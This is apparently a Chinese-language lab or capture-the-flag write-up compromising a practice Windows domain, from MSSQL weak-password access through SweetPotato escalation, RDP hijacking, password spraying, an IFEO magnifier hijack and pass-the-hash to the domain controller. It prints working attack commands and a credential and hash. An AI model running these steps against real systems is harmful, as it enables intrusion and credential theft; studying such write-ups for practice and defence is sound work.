IP拿到就是扫

1
fscan.exe -h 39.98.117.35

image-20250928080423312

MSSQL-getshell

mssql弱口令,直连MDUT,直接上vshell

image-20250928081310586

看目录发现需要提权

image-20250928081536053

🥔提权-getflag1

直接甜土豆win!

1
C:/Users/Public/Downloads/SweetPotato1.exe -a "whoami"

image-20250928082916016

高权限再次运行马,获得system-shell

image-20250928083138471

image-20250928083211359

1
flag{2ef328ee-0ff4-4c7b-bd0d-c822b73827f5}

usersession?那是啥?

隧道+内网信息收集

fscan继续扫

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
172.22.8.18
WIN-WEB
已拿下
172.22.8.15
DC:XIAORANG\DC01
Open 172.22.8.15:53
Open 172.22.8.15:88
Open 172.22.8.15:135
Open 172.22.8.15:139
Open 172.22.8.15:389
Open 172.22.8.15:445
Open 172.22.8.15:464
Open 172.22.8.15:593
Open 172.22.8.15:636
Open 172.22.8.15:3268
Open 172.22.8.15:3269
Open 172.22.8.15:3389
Open 172.22.8.15:9389
Open 172.22.8.15:15774
Open 172.22.8.15:47001
Open 172.22.8.15:49665
Open 172.22.8.15:49664
Open 172.22.8.15:49666
Open 172.22.8.15:49667
Open 172.22.8.15:49668
Open 172.22.8.15:49669
Open 172.22.8.15:51988
Open 172.22.8.15:51989
Open 172.22.8.15:51996
Open 172.22.8.15:52003
Open 172.22.8.15:52014
Open 172.22.8.15:63295
172.22.8.31
XIAORANG\WIN19-CLIENT
Open 172.22.8.31:135
Open 172.22.8.31:139
Open 172.22.8.31:445
Open 172.22.8.31:3389
Open 172.22.8.31:15774
Open 172.22.8.31:47001
Open 172.22.8.31:49664
Open 172.22.8.31:49665
Open 172.22.8.31:49666
Open 172.22.8.31:49667
Open 172.22.8.31:49668
Open 172.22.8.31:49669
Open 172.22.8.31:49673
Open 172.22.8.31:49675
Open 172.22.8.31:49676
172.22.8.46
WIN2016.xiaorang.lab
Open 172.22.8.46:80
Open 172.22.8.46:135
Open 172.22.8.46:139
Open 172.22.8.46:445
Open 172.22.8.46:3389
Open 172.22.8.46:15774
Open 172.22.8.46:47001
Open 172.22.8.46:49664
Open 172.22.8.46:49665
Open 172.22.8.46:49666
Open 172.22.8.46:49667
Open 172.22.8.46:49668
Open 172.22.8.46:49669
Open 172.22.8.46:49673
Open 172.22.8.46:49675

看不出来啥,没在域中,使用编写的单机信息收集工具,发现一个john用rdp连着本机

1
wrtbyjun.bat

image-20250928095128612

cs进程注入劫持rdp

image-20250928105204553

再次单机信息收集

image-20250928105218594

image-20250928105327947

得到一个账密进行密码喷洒,还有提示

密码喷洒

1
proxychains crackmapexec smb 172.22.8.0/24 -u Aldrich -p Ald@rLMWuy7Z!# -d xiaorang.lab

三台貌似都能登,3389都开了

image-20250928110417479

1
proxychains rdesktop -u Aldrich -p 'Ald@rLMWuy7Z!#' -r disk:share=/tmp 172.22.8.31

提示密码过期要改密码

image-20250928123123852

GG

1
proxychains rdesktop -u Aldrich -p 'Ald@rLMWuy7Z!#' -r disk:share=/tmp 172.22.8.46

进了

image-20250928123803288

域信息收集

image-20250928131409857

46属于管理员组<=>提权46就是拿下域控

提权46

根据提示

1
Do you know how to hijack Image?

验证漏洞

1
2
# 用于检查 IFEO 注册表项的权限配置是否安全
Get-ACL -Path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options" | fl

image-20250928134802521

任何已登录的普通用户(如 Aldrich)都可修改 IFEO

接下来修改注册表,劫持放大镜

1
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe" /v "Debugger" /t REG_SZ /d "c:\windows\system32\cmd.exe" /f

锁定用户之后,点击右下角,然后找放大镜,最后成功弹出cmd

image-20250928135306241

1
flag{86cba829-0d76-4b89-8f68-e7178893da46}

不出网中转上线CS

1
C:\Users\Aldrich\Desktop\beacon_x64.exe

image-20250928141907381

image-20250928141922447

抓取hash

image-20250928144108029

1
proxychains python3 wmiexec.py -hashes :7d41b1d77a426e70332f9582476460b9 xiaorang.lab/WIN2016\$@172.22.8.15

image-20250928144255905

1
flag{029897d7-d2e9-4d4c-8f20-fef2c1ce3e2b}